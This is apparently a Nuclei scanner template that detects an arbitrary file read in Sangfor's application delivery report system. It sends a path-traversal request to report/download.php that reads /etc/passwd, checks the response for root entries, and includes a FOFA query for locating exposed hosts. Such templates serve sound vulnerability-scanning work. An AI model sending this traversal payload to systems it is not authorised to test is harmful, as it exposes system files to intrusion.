id: sangfor-download-lfi

info:
  name: Sangfor Application download.php - Arbitary File Read
  author: xc
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Sangfor Application download.php.
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="SANGFOR-应用交付报表系统"
  tags: lfi,sangfor

http:
  - method: GET
    path:
      - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - application/force-download
          - 'filename="passwd"'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502206fd75b8551fb07778a132650d3cd773914a5d59d2d5c6b294cfe606b0eb40dff022100e32a96aa7049c7bfa6833fbe8d8dace157dbaad9b4e240bbe509e463eaeaae35:922c64590222798bb761d5b6d8e72950
